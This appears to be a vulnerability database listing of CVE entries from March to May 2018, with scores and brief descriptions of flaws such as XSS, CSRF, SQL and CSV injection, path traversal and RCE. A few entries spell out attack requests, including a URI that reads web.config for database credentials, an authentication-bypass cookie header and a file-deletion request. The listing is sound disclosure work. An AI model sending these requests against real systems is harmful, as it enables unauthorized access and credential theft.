CVE-2018-10257 6.5
A CSV Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10256 6.5
A SQL Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to directly modify the SQL query.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10255 6.5
A CSV Injection vulnerability was discovered in clustercoding Blog Master Pro v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2016-10036 7.5
Unrestricted file upload vulnerability in ui/artifact/upload in JFrog Artifactory before 4.16 allows remote attackers to (1) deploy an arbitrary servlet application and execute arbitrary code by uploading a war file or (2) possibly write to arbitrary
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10365 3.5
An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link. The thread link input box is not properly sanitized.
01-05-2018 - 12:29 01-05-2018 - 12:29
CVE-2018-10371 4.3
An issue was discovered in the wunderfarm WF Cookie Consent plugin 1.1.3 for WordPress. A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to
01-05-2018 - 09:29 01-05-2018 - 09:29
CVE-2018-10504 6.8
The WebDorado "Form Maker by WD" plugin before 1.12.24 for WordPress allows CSV injection.
27-04-2018 - 12:29 27-04-2018 - 12:29
CVE-2018-7465 3.5
An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the backend of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser wi
26-04-2018 - 15:29 26-04-2018 - 15:29
CVE-2018-8716 3.5
WSO2 Identity Server before 5.5.0 has XSS via the dashboard, allowing attacks by low-privileged attackers.
25-04-2018 - 16:29 25-04-2018 - 16:29
CVE-2018-10366 4.3
An issue was discovered in the Users (aka Front-end user management) plugin 1.4.5 for October CMS. XSS exists in the name field.
25-04-2018 - 05:29 25-04-2018 - 05:29
CVE-2018-10310 3.5
A persistent cross-site scripting vulnerability has been identified in the web interface of the Catapult UK Cookie Consent plugin before 2.3.10 for WordPress that allows the execution of arbitrary HTML/script code in the context of a victim's browser
25-04-2018 - 05:29 25-04-2018 - 05:29
CVE-2018-10321 3.5
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings.
24-04-2018 - 02:29 24-04-2018 - 02:29
CVE-2018-10313 3.5
WUZHI CMS 4.1.0 allows persistent XSS via the form%5Bqq_10%5D parameter to the /index.php?m=member&f=index&v=profile&set_iframe=1 URI.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10312 6.8
index.php?m=member&v=pw_reset in WUZHI CMS 4.1.0 allows CSRF to change the password of a common member.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10311 4.3
A vulnerability was discovered in WUZHI CMS 4.1.0. There is persistent XSS that allows remote attackers to inject arbitrary web script or HTML via the tag[pinyin] parameter to the /index.php?m=tags&f=index&v=add URI.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10309 3.5
The Responsive Cookie Consent plugin before 1.8 for WordPress mishandles number fields, leading to XSS.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-8880 5.0
Lutron Quantum BACnet Integration 2.0 (firmware 3.2.243) doesn't check for correct user authentication before showing the /deviceIP information, which leads to internal network information disclosure.
23-04-2018 - 14:29 23-04-2018 - 14:29
CVE-2018-9245 10.0
The Ericsson-LG iPECS NMS A.1Ac login portal has a SQL injection vulnerability in the User ID and password fields that allows users to bypass the login page and execute remote code on the operating system.
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-10286 4.0
The Ericsson-LG iPECS NMS A.1Ac web application discloses sensitive information such as the NMS admin credentials and the PostgreSQL database credentials to logged-in users via the responses to certain HTTP POST requests. In order to be able to see t
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-10285 7.5
The Ericsson-LG iPECS NMS A.1Ac web application uses incorrect access control mechanisms. Since the app does not use any sort of session ID, an attacker might bypass authentication.
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-7747 3.5
Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log,
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10079 2.1
Geist WatchDog Console 3.2.2 uses a weak ACL for the C:\ProgramData\WatchDog Console directory, which allows local users to modify configuration data by updating (1) config.xml or (2) servers.xml.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10078 3.5
Cross-site scripting (XSS) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via a server description.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10077 4.0
XML external entity (XXE) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to read arbitrary files via crafted XML data.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10201 5.0
An issue was discovered in NcMonitorServer.exe in NC Monitor Server in NComputing vSpace Pro 10 and 11. It is possible to read arbitrary files outside the root directory of the web server. This vulnerability could be exploited remotely by a crafted U
20-04-2018 - 04:29 20-04-2018 - 04:29
CVE-2018-10188 6.8
phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/db_operations.js, js/tbl_operations.js, libraries/classes/Operations.php, and sql.php.
19-04-2018 - 10:29 19-04-2018 - 10:29
CVE-2018-9137 3.5
Open-AudIT before 2.2 has CSV Injection.
19-04-2018 - 04:29 19-04-2018 - 04:29
CVE-2018-2791 5.8
Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). Supported versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated att
18-04-2018 - 22:29 18-04-2018 - 22:29
CVE-2018-8831 4.3
A Persistent XSS vulnerability exists in Kodi (formerly XBMC) through 17.6 that allows the execution of arbitrary HTML/script code in the context of the victim user's browser via a playlist.
18-04-2018 - 13:29 18-04-2018 - 13:29
CVE-2015-9222 7.8
In Android before 2018-04-05 or earlier security patch level on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 650/52, SD 800, SD 808, SD 810, SD 82
18-04-2018 - 10:29 18-04-2018 - 10:29
CVE-2018-10070 7.8
A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many '\0' characters, preventing the affected ro
17-04-2018 - 21:29 16-04-2018 - 17:29
CVE-2018-10063 6.8
The Convert Forms extension before 2.0.4 for Joomla! is vulnerable to Remote Command Execution using CSV Injection that is mishandled when exporting a Leads file.
17-04-2018 - 21:29 12-04-2018 - 15:29
CVE-2018-8736 9.0
A privilege escalation vulnerability in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to leverage an RCE vulnerability escalating to root.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8735 9.0
Remote command execution (RCE) vulnerability in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to execute arbitrary commands on the target system, aka OS command injection.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8734 7.5
SQL injection vulnerability in the core config manager in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to execute arbitrary SQL commands via the selInfoKey1 parameter.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8733 6.4
Authentication bypass vulnerability in the core config manager in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an unauthenticated attacker to make configuration changes and leverage an authenticated SQL injection vulnerability.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-5430 4.0
The Spring web flows of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and A
17-04-2018 - 14:29 17-04-2018 - 14:29
CVE-2018-9843 7.5
The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.
16-04-2018 - 05:58 12-04-2018 - 11:29
CVE-2018-10118 3.5
Monstra CMS 3.0.4 has Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI, related to plugins/box/pages/pages.admin.php.
16-04-2018 - 05:58 16-04-2018 - 05:58
CVE-2018-10109 3.5
Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload in the content section of a new page in the blog catalog.
16-04-2018 - 05:58 16-04-2018 - 05:58
CVE-2018-10080 5.0
Secutech RiS-11, RiS-22, and RiS-33 devices with firmware V5.07.52_es_FRI01 allow DNS settings changes via a goform/AdvSetDns?GO=wan_dns.asp request in conjunction with a crafted admin cookie.
13-04-2018 - 00:29 13-04-2018 - 00:29
CVE-2018-10068 4.3
The jDownloads extension before 3.2.59 for Joomla! has XSS.
12-04-2018 - 14:29 12-04-2018 - 14:29
CVE-2018-9155 3.5
Cross-site scripting (XSS) vulnerability in Open-AudIT Professional 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the Admin->Logs section (with a logs?logs.type= URI) and th
12-04-2018 - 11:29 12-04-2018 - 11:29
CVE-2018-9118 5.0
exports/download.php in the 99 Robots WP Background Takeover Advertisements plugin before 4.1.5 for WordPress has Directory Traversal via a .. in the filename parameter.
12-04-2018 - 11:29 12-04-2018 - 11:29
CVE-2018-9038 5.5
Monstra CMS 3.0.4 allows remote attackers to delete files via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
10-04-2018 - 14:29 10-04-2018 - 14:29
CVE-2018-9037 6.5
Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, which is automatically extracted and may contain .php files.
10-04-2018 - 14:29 10-04-2018 - 14:29
CVE-2017-14611 6.4
SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component.
10-04-2018 - 11:29 10-04-2018 - 11:29
CVE-2018-9926 6.8
An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
10-04-2018 - 02:29 10-04-2018 - 02:29
CVE-2018-1217 5.0
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthent
09-04-2018 - 16:29 09-04-2018 - 16:29
CVE-2018-9857 4.3
PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to searchbyid.php (aka the "View Search By Id" screen).
09-04-2018 - 03:29 09-04-2018 - 03:29
CVE-2018-9844 4.3
The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS.
07-04-2018 - 03:29 07-04-2018 - 03:29
CVE-2018-1270 7.5
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A ma
06-04-2018 - 09:29 06-04-2018 - 09:29
CVE-2018-9126 5.0
The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote attackers to read the web.config file, and consequently discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9035 6.8
CSV Injection vulnerability in ExportToCsvUtf8.php of the Contact Form 7 to Database Extension plugin 2.10.32 for WordPress allows remote attackers to inject spreadsheet formulas into CSV files via the contact form.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9034 3.5
Cross-site scripting (XSS) vulnerability in lib/interface.php of the Relevanssi plugin 4.0.4 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the tab GET parameter.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-8719 5.0
An issue was discovered in the WP Security Audit Log plugin 3.1.1 for WordPress. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find se
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9248 7.5
FiberHome VDSL2 Modem HG 150-UB devices allow authentication bypass via a "Cookie: Name=0admin" header.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-9205 5.0
Vulnerability in avatar_uploader v7.x-1.0-beta8. The code in view.php doesn't verify users or sanitize the file path.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-8814 5.8
Cross-site request forgery (CSRF) vulnerability in WolfCMS 0.8.3.1 allows remote attackers to hijack the authentication of users for requests that modify plugin/[pluginname]/settings by crafting a malicious request.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-8813 4.9
Open redirect vulnerability in the login[redirect] parameter of the login functionality in WolfCMS 0.8.3.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a malformed URL.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-9238 4.3
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9237 3.5
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" field.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9236 3.5
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site title" field.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9235 4.3
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query parameter to search.php.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9183 3.5
The Joom Sky JS Jobs extension before 1.2.1 for Joomla! has XSS.
02-04-2018 - 11:29 02-04-2018 - 11:29
CVE-2018-9163 3.5
A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 (Build 5350) allows remote authenticated users (with Add New Technician permissions) to inject arbitrary web script or HTML via the loginName fiel
02-04-2018 - 08:29 02-04-2018 - 08:29
CVE-2018-9173 4.3
Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.
01-04-2018 - 23:29 01-04-2018 - 23:29
CVE-2018-9172 3.5
The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes.
01-04-2018 - 19:29 01-04-2018 - 19:29
CVE-2018-6849 4.3
In the WebRTC component in DuckDuckGo 4.2.0, after visiting a web site that attempts to gather complete client information (such as https://ip.voidsec.com), the browser can disclose a private IP address in a STUN request.
01-04-2018 - 14:29 01-04-2018 - 14:29
CVE-2018-9162 7.5
Contec Smart Home 4.15 devices do not require authentication for new_user.php, edit_user.php, delete_user.php, and user.php, as demonstrated by changing the admin password and then obtaining control over doors.
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-9161 7.5
Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-8908 6.8
An issue was discovered in /admin/?/user/add in Frog CMS 0.9.5. The application's add user functionality suffers from CSRF. A malicious user can craft an HTML page and use it to trick a victim into clicking on it; once executed, a malicious user will
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-9160 5.0
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
31-03-2018 - 17:29 31-03-2018 - 17:29
CVE-2018-7203 4.3
Cross-site scripting (XSS) vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to inject arbitrary web script or HTML via the friendlyname parameter to rpc/set_all.
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-7171 5.0
Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-5708 6.1
An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the c
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-9148 5.0
Western Digital WD My Cloud v04.05.00-320 devices embed the session token (aka PHPSESSID) in filenames, which makes it easier for attackers to bypass authentication by listing a directory. NOTE: this can be exploited in conjunction with CVE-2018-7171
30-03-2018 - 15:29 30-03-2018 - 15:29
CVE-2018-7600 7.5
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
29-03-2018 - 03:29 29-03-2018 - 03:29
CVE-2018-9107 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcyMailing extension before 5.9.6 for Joomla! via a value that is mishandled in a CSV export.
28-03-2018 - 00:29 28-03-2018 - 00:29
CVE-2018-9106 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcySMS extension before 3.5.1 for Joomla! via a value that is mishandled in a CSV export.
28-03-2018 - 00:29 28-03-2018 - 00:29
CVE-2018-9092 6.8
There is a CSRF vulnerability in mc-admin/conf.php in MiniCMS 1.10 that can change the administrator account password.
27-03-2018 - 18:29 27-03-2018 - 18:29
CVE-2018-8718 6.0
Cross-site request forgery (CSRF) vulnerability in the Mailer Plugin 1.20 for Jenkins 2.111 allows remote authenticated users to send unauthorized mail as an arbitrary user via a /descriptorByName/hudson.tasks.Mailer/sendTestMail request.
27-03-2018 - 12:29 27-03-2018 - 12:29
CVE-2018-9032 7.5
An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version : A1, B1; Firmware Version : 1.02-2.06) devices potentially allows attackers to bypass SharePort Web Access Portal by directly
26-03-2018 - 23:29 26-03-2018 - 23:29
CVE-2018-7543 4.3
Cross-site scripting (XSS) vulnerability in installer/build/view.step4.php of the SnapCreek Duplicator plugin 1.2.32 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the json parameter.
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1213 6.8
Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and versions 7.1.1.11 and 8.1.0.2 are affected by a cross-site request forgery vulnerability. A malicious user may potentially exploit
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1204 7.2
Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 are affected by a path traversal vulnerability in the isi_phone_home tool. A malicious compadmin may potentially
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1203 7.2
In Dell EMC Isilon OneFS, the compadmin is able to run tcpdump binary with root privileges. In versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, the tcpdump binary, being run with sudo, may potentially be used by compadmin
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1202 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and version 7.1.1.11 are affected by a cross-site scripting vulnerability in the NDMP Page within the OneFS web administration interface. A malicious adminis
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1201 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 are affected by a cross-site scripting vulnerability in the Job Operations Page within the OneFS web administration in
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1189 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 are affected by a cross-site scripting vulnerability in the Antivirus Page within the OneFS web administration interfa
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1188 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and versions 7.2.1.x are affected by a cross-site scripting vulnerability in the Authorization Providers page within the OneFS web administration interface.
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1187 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6 are affected by a cross-site scripting vulnerability in the Network Configuration page within the OneFS web administration interface. A malicious administrato
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1186 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 are affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interf
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-8979 6.8
Open-AudIT Professional 2.1 has CSRF, as demonstrated by modifying a user account or inserting XSS sequences via the credentials URI.
25-03-2018 - 15:29 25-03-2018 - 15:29
CVE-2018-8817 6.8
Wampserver before 3.1.3 has CSRF in add_vhost.php.
25-03-2018 - 15:29 25-03-2018 - 15:29
CVE-2018-9010 5.0
Intelbras TELEFONE IP TIP200/200 LITE 60.0.75.29 devices allow remote authenticated admins to read arbitrary files via the /cgi-bin/cgiServer.exx page parameter, aka absolute path traversal. In some cases, authentication can be achieved via the admin
25-03-2018 - 14:29 25-03-2018 - 14:29
CVE-2018-8947 5.0
rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request.
25-03-2018 - 12:29 25-03-2018 - 12:29
CVE-2018-8903 3.5
Open-AudIT Professional 2.1 allows XSS via the Name or Description field on the Credentials screen.
22-03-2018 - 17:29 22-03-2018 - 17:29
CVE-2014-4912 7.5
An Arbitrary File Upload issue was discovered in Frog CMS 0.9.5 due to lack of extension validation.
22-03-2018 - 00:29 22-03-2018 - 00:29
CVE-2014-1665 3.5
Cross-site scripting (XSS) vulnerability in ownCloud before 6.0.1 allows remote authenticated users to inject arbitrary web script or HTML via the filename of an uploaded file.
20-03-2018 - 17:29 20-03-2018 - 17:29
CVE-2018-8815 3.5
Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or HTML via a malicious SVG image.
20-03-2018 - 03:29 20-03-2018 - 03:29
CVE-2018-8811 6.8
Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
20-03-2018 - 03:29 20-03-2018 - 03:29
CVE-2018-8732 3.5
Cross-site scripting (XSS) vulnerability in WampServer 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the virtual_del parameter.
19-03-2018 - 16:29 19-03-2018 - 16:29
CVE-2018-7422 5.0
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absol
19-03-2018 - 10:29 19-03-2018 - 10:29
CVE-2018-8770 5.0
Physical path leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, control
18-03-2018 - 02:29 18-03-2018 - 02:29
CVE-2014-4613 4.3
Cross-site request forgery (CSRF) vulnerability in the administration panel in Piwigo before 2.6.2 allows remote attackers to hijack the authentication of administrators for requests that add users via a pwg.users.add action in a request to ws.php.
16-03-2018 - 13:29 16-03-2018 - 13:29
CVE-2018-6230 8.3
A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 search configuration script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6229 10.0
A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 edit policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6228 10.0
A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6227 3.5
A stored cross-site scripting (XSS) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject client-side scripts into vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6226 3.5
Reflected cross-site scripting (XSS) vulnerabilities in two Trend Micro Email Encryption Gateway 5.5 configuration files could allow an attacker to inject client-side scripts into vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6225 4.0
An XML external entity injection (XXE) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an authenticated user to expose a normally protected configuration script.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6224 6.8
A lack of cross-site request forgery (CSRF) protection vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to submit authenticated requests to a user browsing an attacker-controlled domain.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6223 5.0
A missing authentication for appliance registration vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to manipulate the registration process of the product to reset configuration parameters.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6222 7.2
An arbitrary log location vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to change the location of log files, which could then be manipulated to execute arbitrary commands and attain command execution on a vulnerable system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6221 9.3
An unvalidated software update vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a man-in-the-middle attacker to tamper with an update file and inject their own.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6220 7.5
An arbitrary file write vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject arbitrary data, which may lead to gaining code execution on vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6219 6.4
An Insecure Update via HTTP vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to eavesdrop and tamper with certain types of update data.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-8729 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.
15-03-2018 - 13:29 15-03-2018 - 13:29
CVE-2018-7707 4.3
Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via an HTML-formatted e-mail message.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7706 4.0
Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read arbitrary e-mail messages via a .. (dot dot) in the option2 parameter in an attachment action to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7705 5.5
Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read e-mail messages to arbitrary recipients via a .. (dot dot) in the filename parameter to secupload2/upload.aspx.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7704 4.0
SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read arbitrary e-mail messages via the option1 parameter in a reply action to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7703 4.3
Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via the mailboxid parameter to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7702 6.4
SecurEnvoy SecurMail before 9.2.501 allows remote attackers to spoof transmission of arbitrary e-mail messages, resend e-mail messages to arbitrary recipients, or modify arbitrary message bodies and attachments by leveraging missing authentication an
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7701 5.8
Multiple cross-site request forgery (CSRF) vulnerabilities in SecurEnvoy SecurMail before 9.2.501 allow remote attackers to hijack the authentication of arbitrary users for requests that (1) delete e-mail messages via a delete action in a request to
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-0880 6.9
The Desktop Bridge in Windows 10 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an elevation of privilege vulnerability due to how the virtual registry is managed, aka "Windows Desktop Bridge Elevation of Privilege
14-03-2018 - 13:29 14-03-2018 - 13:29
